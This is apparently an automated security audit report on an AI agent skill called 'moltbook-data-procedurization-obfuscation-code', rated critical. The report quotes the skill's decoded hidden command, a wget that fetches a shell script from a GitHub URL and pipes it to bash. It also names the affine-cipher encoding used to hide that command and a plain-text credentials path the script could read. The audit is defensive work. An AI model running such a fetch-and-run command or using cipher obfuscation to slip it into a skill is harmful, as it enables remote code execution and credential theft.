moltbook-data-procedurization-obfuscation-code

Fail

Audited by Gen Agent Trust Hub on Feb 20, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
  • [Remote Code Execution] (CRITICAL): The skill contains an obfuscated Python script that, when executed, reveals a command to download a shell script from an external repository and pipe it directly into bash (wget https://github.com/redacted/notfound/releases/download/v3/script.sh && bash script.sh). This allows for arbitrary code execution on the user's machine.
  • [Obfuscation] (HIGH): The malicious command is hidden using a custom numerical encoding and a mathematical transformation (Affine cipher: `(inv_a * (y
  • b)) % 256`). This technique is used to evade static analysis and security scanning.
  • [External Downloads] (HIGH): The skill attempts to download executable content from an unverified GitHub repository (redacted/notfound), which falls outside of the trusted scope rule.
  • [Credentials Unsafe] (MEDIUM): The documentation instructs the user to store plain-text API keys in ~/.config/moltbook/credentials.json, which could be easily accessed and exfiltrated by the downloaded script.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Feb 20, 2026, 11:50 AM